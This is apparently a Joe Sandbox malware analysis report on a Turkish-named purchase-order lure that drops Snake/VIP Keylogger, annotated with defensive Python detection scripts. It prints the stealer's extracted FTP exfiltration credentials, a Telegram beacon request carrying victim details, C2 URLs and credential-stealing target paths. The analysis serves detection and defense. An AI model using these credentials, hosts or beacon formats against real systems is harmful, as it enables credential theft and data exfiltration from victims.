Windows Analysis Report
Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe

Overview

General Information

Sample name: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe
(Joe Sandbox writes non-ASCII characters in file names as #Uxxxx escapes: U+0131 is ı and U+015F is ş, so the submitted file is "Satınalma Siparişi Q4-2025-V5560001.exe", Turkish for "Purchase Order Q4-2025-V5560001.exe", i.e. a purchase-order phishing lure. The escaped form is kept throughout because the memory-dump and unpack identifiers use it.)
Original sample name: Satnalma Siparii Q4-2025-V5560001.exe
Analysis ID: 1640565
MD5: e955281fbc1e1ea32966a99e8441cb0e
SHA1: 44904346cf2099f47b8b794e02215d096cfec35c
SHA256: a0d767fd05c090d8d2f7f32b4a545fa5256e80962ec54facdaf2ac89f8acb3f7
Tags: exe, user-adrian__luca

Detection

Verdict: Snake Keylogger, VIP Keylogger
Score: 100 (range 0 - 100)
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Binary is likely a compiled AutoIt script file
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe (PID: 6244, cmdline: "C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe", MD5: E955281FBC1E1EA32966A99E8441CB0E)
    • RegSvcs.exe (PID: 2400, cmdline: "C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe", MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      The child image is the .NET Services Installation Tool (C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, the path used in the code-function entries below), yet its command line is the parent's own path. Read together with the "Creates a process in suspended mode", "Writes to foreign memory regions" and "Maps a DLL or memory area into another process" signatures, this is consistent with the AutoIt stub starting RegSvcs.exe suspended and replacing its image with the .NET keylogger payload; the Yara hits on the process 2 (RegSvcs.exe) memory dumps are that injected payload, not RegSvcs.exe itself.
  • cleanup
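The image/command-line mismatch visible in the process tree above is a hunting signal that can be checked mechanically in process-creation telemetry. The following Python is an added example written for this page, not code from Joe Sandbox or from the malware: it takes Sysmon Event ID 1-style records (the Image, CommandLine and ParentImage fields; the records are constructed to mirror the tree above with the Turkish file name decoded, and PID 5100 is an invented benign RegSvcs.exe run for contrast), flags any process whose command line names a different executable than its image, and additionally flags a .NET utility spawned from a user-writable path. The list of .NET injection targets beyond RegSvcs.exe is an assumption from general experience, not taken from this report.

```python
"""Flag process-creation events whose command line does not match the image that actually runs.

Added example for this page (not report or malware code). Records are Sysmon Event ID 1-style
dicts constructed to mirror the report's process tree (PID 6244 -> PID 2400); PID 5100 is an
invented benign RegSvcs.exe run for contrast.
"""
import ntpath

SAMPLE_NAME = r"C:\Users\user\Desktop\Satınalma Siparişi Q4-2025-V5560001.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

SAMPLE_EVENTS = [
    {"ProcessId": 6244, "Image": SAMPLE_NAME, "CommandLine": f'"{SAMPLE_NAME}"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    # Hollowed child: RegSvcs.exe image, but the parent's own path as command line.
    {"ProcessId": 2400, "Image": REGSVCS, "CommandLine": f'"{SAMPLE_NAME}"',
     "ParentImage": SAMPLE_NAME},
    # Benign (invented): command line names the image that runs, parent is a system binary.
    {"ProcessId": 5100, "Image": REGSVCS, "CommandLine": f'"{REGSVCS}" C:\\app\\MyService.dll',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# .NET utilities commonly hollowed by commodity stealers. RegSvcs.exe is the one in the report;
# the others are an assumption from general experience, not from this analysis.
NET_INJECTION_TARGETS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
USER_WRITABLE_MARKERS = ("\\users\\", "\\programdata\\", "\\temp\\")


def first_token(cmdline):
    """Executable path from a Windows command line: the quoted first token, or text up to the first space."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def find_hollowed(events):
    """Return [(pid, reason)] for events showing an image/command-line mismatch or a suspicious .NET spawn."""
    hits = []
    for ev in events:
        image = ev["Image"]
        claimed = first_token(ev["CommandLine"])
        reasons = []
        # ntpath.normcase lower-cases and normalises separators, so the comparison works on any host OS.
        if ntpath.normcase(claimed) != ntpath.normcase(image):
            reasons.append(f"command line names {claimed!r} but image is {image!r}")
        parent = ntpath.normcase(ev["ParentImage"])
        if ntpath.basename(image).lower() in NET_INJECTION_TARGETS and any(
            marker in parent for marker in USER_WRITABLE_MARKERS
        ):
            reasons.append(".NET utility spawned from a user-writable path")
        if reasons:
            hits.append((ev["ProcessId"], "; ".join(reasons)))
    return hits


if __name__ == "__main__":
    for pid, reason in find_hollowed(SAMPLE_EVENTS):
        print(pid, reason)
```

Only PID 2400 is reported, with both reasons. The mismatch rule alone is a heuristic: some legitimate launchers also rewrite the command line of the process they start, so in production it is best combined with the parent-path condition or with the suspended-start and cross-process-write events the sandbox recorded.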
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Extracted malware configuration (VIP Keylogger, from the RegSvcs.exe memory dump):
{"Exfil Mode": "FTP", "Username": "bless@ercolina-usa.com", "Password": "XWszt[=}{0?6", "FTP Server": "ftp://ftp.ercolina-usa.com//"}
Yara matches on memory dumps (Source | Rule | Description | Author):
  • 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
  • 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  • 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
  • 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
  • 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
    Matched strings:
    • 0x354b7: $a1: get_encryptedPassword
    • 0x3548b: $a2: get_encryptedUsername
    • 0x3554f: $a3: get_timePasswordChanged
    • 0x35467: $a4: get_passwordField
    • 0x354cd: $a5: set_encryptedPassword
    • 0x3529a: $a7: get_logins
    • 0x30b7e: $a10: KeyLoggerEventArgs
    • 0x30b4d: $a11: KeyLoggerEventArgsEventHandler
    • 0x3536e: $a13: _encryptedPassword
    The get_/set_ names are .NET property accessors and map one-to-one onto the fields of Firefox's logins.json (logins, encryptedUsername, encryptedPassword, passwordField, timePasswordChanged), i.e. the class the stealer deserialises Firefox credentials into; KeyLoggerEventArgs is the keystroke-capture event type.
  (14 entries in the full report; only those above were captured here)
Yara matches on unpacked files (Source | Rule | Description | Author):
  • 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  • 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
  • 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
  • 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
    Matched strings:
    • 0x338b7: $a1: get_encryptedPassword
    • 0x3388b: $a2: get_encryptedUsername
    • 0x3394f: $a3: get_timePasswordChanged
    • 0x33867: $a4: get_passwordField
    • 0x338cd: $a5: set_encryptedPassword
    • 0x3369a: $a7: get_logins
    • 0x2ef7e: $a10: KeyLoggerEventArgs
    • 0x2ef4d: $a11: KeyLoggerEventArgsEventHandler
    • 0x3376e: $a13: _encryptedPassword
  • 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
    Matched strings:
    • 0x3d65e: $a2: \Comodo\Dragon\User Data\Default\Login Data
    • 0x3cd01: $a3: \Google\Chrome\User Data\Default\Login Data
    • 0x3cf5e: $a4: \Orbitum\User Data\Default\Login Data
    • 0x3d93d: $a5: \Kometa\User Data\Default\Login Data
    "Login Data" is the SQLite file in which Chromium-based browsers store saved logins; the matched paths show the payload targets several Chromium derivatives (Comodo Dragon, Chrome, Orbitum, Kometa), not just Chrome. The rule was written for a different stealer family (Envrial); the hit is on these shared browser paths, not on family-specific code.
  (13 entries in the full report; only those above were captured here)
                No Sigma rule has matched
Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source | Destination | Protocol):
  • 2025-03-17T13:03:38.400816+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8:49684 | 104.21.32.1:443 | TCP
  • 2025-03-17T13:03:45.490348+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8:49694 | 104.21.32.1:443 | TCP
  • 2025-03-17T13:03:48.443545+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8:49702 | 104.21.32.1:443 | TCP
  • 2025-03-17T13:03:36.755978+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8:49682 | 132.226.8.169:80 | TCP
  • 2025-03-17T13:03:37.818484+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8:49682 | 132.226.8.169:80 | TCP
  • 2025-03-17T13:03:39.240378+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8:49685 | 132.226.8.169:80 | TCP
  • 2025-03-17T13:03:49.380442+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.8:49704 | 149.154.167.220:443 | TCP
  SID 1810007 is the Joe Security "ANOMALY Telegram Send Message" rule and 149.154.167.220 is api.telegram.org (see Networking). SIDs 2803274 and 2803305 are the ETPRO "Common Downloader Header Pattern" rules, which key on request headers rather than on a specific destination; the port-80 hits to 132.226.8.169 line up with the plain-HTTP checkip.dyndns.org requests, the only unencrypted requests in the report.


                AV Detection

Source: 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "bless@ercolina-usa.com", "Password": "XWszt[=}{0?6", "FTP Server": "ftp://ftp.ercolina-usa.com//"}
Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack | String decryptor: bless@ercolina-usa.com
Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack | String decryptor: XWszt[=}{0?6
Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack | String decryptor: ftp://ftp.ercolina-usa.com//
Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack | String decryptor:
The three decrypted strings are exactly the FTP username, password and server that the configuration extractor reports, so the exfil credentials are recoverable from the unpacked payload without running it. ftp.ercolina-usa.com is resolved during the run (see the DNS queries under Networking); whether that domain is attacker-owned or a third-party FTP account being abused is not established by the report.

                Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49683 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP | source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.978158836.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.979850232.0000000003F50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.978158836.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.979850232.0000000003F50000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function 0_2_006B4696: GetFileAttributesW, FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function 0_2_006BC93C: FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function 0_2_006BC9C7: FindFirstFileW, FindClose, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf
Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function 0_2_006BF200: SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, GetFileAttributesW, SetFileAttributesW, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function 0_2_006BF35D: SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function 0_2_006BF65E: FindFirstFileW, Sleep, _wcscmp, _wcscmp, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function 0_2_006B3A2B: FindFirstFileW, DeleteFileW, DeleteFileW, MoveFileW, DeleteFileW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function 0_2_006B3D4E: FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function 0_2_006BBF27: FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code functions containing inlined nop sequences ("4x nop then jmp"), listed as function | jmp target:
  2_2_0125F313 | 0125F4B0h
  2_2_0125F4FF | 0125F4B0h
  2_2_0125F9B8 | 0125FC74h
  2_2_05A6D018 | 05A6D2EBh
  2_2_05A67B88 | 05A67EC8h
  2_2_05A68FC8 | 05A6929Bh
  2_2_05A611A0 | 05A6144Ch
  2_2_05A6BDB8 | 05A6C08Bh
  2_2_05A69D90 | 05A6A063h
  2_2_05A6DDE0 | 05A6E0B3h
  2_2_05A615F8 | 05A618A4h
  2_2_05A6B920 | 05A6BBF3h
  2_2_05A6F970 | 05A6FC1Bh
  2_2_05A60D48 | 05A60FF4h
  2_2_05A6D948 | 05A6DC1Bh
  2_2_05A6D4B0 | 05A6D783h
  2_2_05A6B488 | 05A6B75Bh
  2_2_05A66490 | 05A6673Eh
  2_2_05A60498 | 05A60744h
  2_2_05A608F0 | 05A60B9Ch
  2_2_05A698F8 | 05A69BCBh
  2_2_05A6F4D8 | 05A6F7ABh
  2_2_05A66038 | 05A662E4h
  2_2_05A63008 | 05A632B4h
  2_2_05A63460 | 05A6370Ch
  2_2_05A69460 | 05A69733h
  2_2_05A60040 | 05A602ECh
  2_2_05A6F040 | 05A6F313h
  2_2_05A6EBA8 | 05A6EE7Bh
  2_2_05A62BB0 | 05A62E5Ch
  2_2_05A6CB80 | 05A6CE53h
  2_2_05A65788 | 05A65A34h
  2_2_05A65BE0 | 05A65E8Ch
  2_2_05A6AFF0 | 05A6B2C3h
  2_2_05A65330 | 05A655DCh
  2_2_05A67730 | 05A679DCh
  2_2_05A62300 | 05A625ACh
  2_2_05A6E710 | 05A6E9E3h
  2_2_05A62758 | 05A62A04h
  2_2_05A6AB58 | 05A6AE2Bh
  2_2_05A61EA8 | 05A62154h
  2_2_05A64A80 | 05A64D2Ch
  2_2_05A66E80 | 05A6712Ch
  2_2_05A6C6E8 | 05A6C9BBh
  2_2_05A6A6C0 | 05A6A993h
  2_2_05A64ED8 | 05A65184h
  2_2_05A672D8 | 05A67584h
  2_2_05A64628 | 05A648D4h
  2_2_05A66A28 | 05A66CD4h
  2_2_05A6A228 | 05A6A4FBh
  2_2_05A6E278 | 05A6E54Bh
  2_2_05A61A50 | 05A61CFCh
  2_2_05A6C250 | 05A6C523h

                Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49704 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected (9 requests, 6 of them with "Connection: Keep-Alive"): GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
  The address in the path is presumably the sandbox's public IP as returned by checkip.dyndns.org (that response body is not reproduced in the report); the request carries no User-Agent header, which is what the "HTTP GET or POST without a user agent" signature refers to. The "Country Name: United States" field in the Telegram message below is the result of this lookup.
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2017/03/2025%20/%2020:47:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
  URL-decoded, the text parameter is the first-run notification:
    PC Name:377142
    Date and Time: 17/03/2025 / 20:47:49
    Country Name: United States
    [ 377142 Clicked on the File If you see nothing this's mean the system storage's empty. ]
  Both the bot token (the path segment between /bot and /sendMessage) and chat_id are empty. That is consistent with the extracted configuration selecting FTP rather than Telegram as its exfil mode: the Telegram code path still executes with blank values, which is why the request is observable at all.
Source: Joe Sandbox View | IP address seen in connection with other malware: 132.226.8.169
Source: Joe Sandbox View | IP address seen in connection with other malware: 192.254.225.136
Source: Joe Sandbox View | IP address seen in connection with other malware: 149.154.167.220
Source: Joe Sandbox View | JA3 fingerprint seen in connection with other malware: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint seen in connection with other malware: 3b5074b1b5d032e5620f69f9f700ff0e
  Treat these with care as indicators: 149.154.167.220 is api.telegram.org and 132.226.8.169 serves checkip.dyndns.org, both legitimate services that many families abuse, and a JA3 hash identifies a TLS client stack (here the one the payload runs on) rather than the malware, so the same hash will appear on benign software built on that stack.
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49685 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49682 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49684 -> 104.21.32.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49702 -> 104.21.32.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49694 -> 104.21.32.1:443
Source: global traffic | HTTP traffic detected (10 requests, 7 of them with "Connection: Keep-Alive"): GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
  The MSIE 6.0 / .NET CLR 1.0.3705 User-Agent is a hard-coded string, not the browser or runtime actually present on the w10x64 analysis system, and it is what the "Uses a known web browser user agent" signature and, presumably, the ETPRO SID 2803274 header-pattern alerts on port 80 are keying on. A request for checkip.dyndns.org with this exact User-Agent from a non-browser process is a usable network detection on its own.
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49683 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function 0_2_006C25E2: InternetReadFile, InternetQueryDataAvailable, InternetReadFile
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: ftp.ercolina-usa.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Mon, 17 Mar 2025 12:03:49 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  This is api.telegram.org's reply to the sendMessage request with the empty bot token (the Date header matches the 13:03:49+0100 Telegram alert above). The Bot API answers an unknown or empty token path with a 404 whose JSON body is {"ok":false,"error_code":404,"description":"Not Found"}, which is exactly 55 bytes, the Content-Length shown; the body itself is not reproduced in the report. The notification therefore never reached a Telegram chat. The configured exfil channel is FTP (ftp.ercolina-usa.com was resolved during the run; FTP traffic itself does not appear in the captured section).
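The request sequence above (public-IP lookup with the legacy MSIE 6.0 User-Agent, then a /xml/<ip> geolocation request with no User-Agent, then a Telegram sendMessage whose text parameter carries the host details) can be matched in web-proxy logs. The following Python is an added example for this page, not part of the Joe Sandbox report or of any detection product: it parses a constructed tab-separated proxy log (client, method, host, path, User-Agent, with "-" for a missing header; the three malicious lines are transcribed from the requests above, the fourth is an invented benign request), reports per client which stages of the chain were seen, and URL-decodes the Telegram message to recover the exfiltrated fields together with the bot token and chat_id (both empty here, as in the capture). The log layout, the two-stage threshold and the host list are assumptions.

```python
"""Spot the check-IP -> geo-IP -> Telegram beacon chain in a proxy log and decode the message.

Added example for this page (not report or product code). Input is a constructed,
tab-separated proxy log: client, method, host, path, User-Agent ("-" when absent).
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Hard-coded User-Agent string seen on the checkip.dyndns.org requests in the report.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
IP_CHECK_HOSTS = {"checkip.dyndns.org"}          # assumption: extend with other IP-echo services
GEOIP_PATH = re.compile(r"^/xml/\d{1,3}(?:\.\d{1,3}){3}$")   # reallyfreegeoip.org/xml/<ip>
TELEGRAM_PATH = re.compile(r"^/bot([^/]*)/sendMessage")      # Bot API: /bot<token>/sendMessage

# Constructed log lines; the first three mirror the report's requests, the last is a benign decoy.
SAMPLE_LOG = (
    "192.168.2.8\tGET\tcheckip.dyndns.org\t/\t" + LEGACY_UA + "\n"
    "192.168.2.8\tGET\treallyfreegeoip.org\t/xml/8.46.123.189\t-\n"
    "192.168.2.8\tGET\tapi.telegram.org\t/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0A"
    "PC%20Name:377142%0D%0ADate%20and%20Time:%2017/03/2025%20/%2020:47:49%0D%0A"
    "Country%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20"
    "If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D\t-\n"
    "10.0.0.5\tGET\twww.example.com\t/index.html\tMozilla/5.0\n"
)


def parse_log(text):
    """Split the tab-separated log into dicts; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) != 5:
            continue
        client, method, host, path, ua = parts
        rows.append({"client": client, "method": method, "host": host, "path": path, "ua": ua})
    return rows


def decode_telegram_message(path):
    """Return (bot_token, chat_id, decoded_text) for a Bot API sendMessage path, else None."""
    m = TELEGRAM_PATH.match(path)
    if not m:
        return None
    # parse_qs percent-decodes the values; keep_blank_values keeps the empty chat_id visible.
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)
    return (m.group(1), query.get("chat_id", [""])[0], query.get("text", [""])[0])


def find_beacon_chains(rows, min_stages=2):
    """Group requests by client and report clients that hit at least min_stages of the chain."""
    stages = defaultdict(dict)
    for r in rows:
        c = r["client"]
        if r["host"] in IP_CHECK_HOSTS and r["ua"] == LEGACY_UA:
            stages[c]["ip_check_legacy_ua"] = True
        elif r["host"] == "reallyfreegeoip.org" and GEOIP_PATH.match(r["path"]) and r["ua"] == "-":
            stages[c]["geoip_no_ua"] = True
        elif r["host"] == "api.telegram.org":
            decoded = decode_telegram_message(r["path"])
            if decoded is not None:
                stages[c]["telegram"] = decoded
    return {c: s for c, s in stages.items() if len(s) >= min_stages}


if __name__ == "__main__":
    for client, seen in find_beacon_chains(parse_log(SAMPLE_LOG)).items():
        print(client, sorted(k for k in seen if k != "telegram"))
        if "telegram" in seen:
            token, chat_id, text = seen["telegram"]
            print(f"  bot token={token!r} chat_id={chat_id!r}")
            print("  " + text.replace("\r\n", "\n  "))
```

Requiring two of the three stages keeps a lone IP-echo request (common in legitimate software) from alerting, while any Telegram sendMessage from a client that also did the IP or geo lookup is reported. In a real deployment the Telegram stage is the one to page on, since a recovered bot token and chat_id are directly actionable.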
Source: RegSvcs.exe, 00000002.00000002.3423549370.000000000307F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
